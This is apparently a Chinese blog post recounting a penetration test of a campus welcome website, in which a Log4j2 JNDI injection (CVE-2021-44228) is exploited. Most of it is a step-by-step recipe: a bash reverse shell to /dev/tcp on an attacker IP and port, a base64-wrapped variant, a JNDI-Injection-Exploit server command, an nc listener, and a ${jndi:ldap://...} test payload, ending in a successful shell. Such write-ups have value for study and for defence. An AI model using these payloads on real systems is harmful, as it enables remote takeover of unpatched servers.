【记一次渗透测试无意发现的log4j2】

发布时间 2023-11-21 17:21:20作者: 任尔东西南北风

【告警发现】

在测一个迎新网站的时候发现态势告警dnslog家族请求,看了一下态势感知mmp,我还没测出洞来呢咋服务器自己请求*kmbs6r7ovd.burpcollaborator.net日志了,

 

根据域名搜了一下日志没有发现,然后看了一下服务器的相关日志,在告警服务器请求bp域名之前是“Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)”的日志。

 

【工具准备】

1.jndi工具:https://github.com/sayers522/JNDI-Injection-Exploit

反弹shell payload

bash -i >& /dev/tcp/12211.222.22.48/6666 0>&1

2.base64编码在线:https://ares-x.com/tools/runtime-exec

bash -c {echo,YmFzaCAtaSA+xxxxxxxxxjEuMzYuMTExLjQ4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

3.在vps开启jndi服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAxxxxxxxxMTExLjQ4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "121.36.111.48"

 

4.在vps上监听反弹shell端口

nc -lvvp 6666

 【测试】

5.在每一个点测试payload

${jndi:ldap://asssssasdasdas/poc}

url编码

 

6.服务器加载恶意class类

 7.反弹shell成功

 态势告警

 【参考链接】

payload

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce